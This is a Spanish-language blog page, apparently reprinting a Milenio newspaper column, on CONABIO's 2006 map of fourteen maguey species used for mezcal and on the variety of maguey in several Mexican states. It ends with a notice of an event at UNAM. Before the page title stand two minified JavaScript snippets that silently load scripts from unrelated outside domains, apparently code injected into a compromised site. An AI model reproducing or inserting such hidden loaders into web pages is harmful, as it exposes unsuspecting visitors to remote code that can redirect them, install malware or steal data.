;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 25. Mezcales y biodiversidad

25. Mezcales y biodiversidad


En 2006 la Comisión Nacional para el Conocimiento y Uso de la Biodiversidad (CONABIO) dio a luz la 2ª edición del mapa Mezcales y diversidad, cuyo fin era “difundir información y conocimientos biológicos, ecológicos, geográficos y culturales de los mezcales campesinos e indígenas de México.”
El mapa muestra, mediante bellas ilustraciones, la distribución de 14 especies de maguey utilizadas para elaborar mezcal, pero no representa –aclaro- la densidad poblacional o productiva, sólo muestra su presencia en algunas regiones. Esta “distribución potencial fue modelada a partir de las condiciones ecológicas que les son favorables. Se utilizaron altitud, precipitación, temperatura, evapotranspiración, suelos y tipo de vegetación de las localidades de recolecta de ejemplares de herbario.”
La obra brinda información sobre el territorio del maguey, biología, historia natural, usos, ecosistemas y los nombres comunes y en lenguas indígenas o lenguas nacionales. También describe los procesos de elaboración de los mezcales, haciendo hincapié en la diversidad y riqueza que representan para nuestro país.
Muchos trabajos como éste son indispensables para contar con inventarios completos de nuestro patrimonio mezcalero. Baste decir, como ejemplos, que: de una sola especie de las mostradas en el mapa (Agave karwinskii Zucc), de las muchas que hay en Oaxaca, productores oaxaqueños de maguey y mezcal han identificado 35 variedades, de las que se obtienen 35 mezcales diferentes; en Zapotitlán, Jalisco, se cultivan 12 variedades de maguey; en el Estado de México, donde utilizan el maguey que llaman Criollo, los mezcaleros identifican 10 variedades: 57 magueyes en ¡sólo tres estados!, de los 21 en los que se hace mezcal tradicional.
Quien desee conocer el mapa, acuda al evento “La Milpa: baluarte de nuestra diversidad Biológica y Cultural” del 21 al 23 de mayo en la UNAM: explanada de la Biblioteca Central, CU, DF, de 10 a 17 hrs. También puede solicitarse un resumen del mapa al correo de abajo.
http://impreso.milenio.com/node/8771607

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *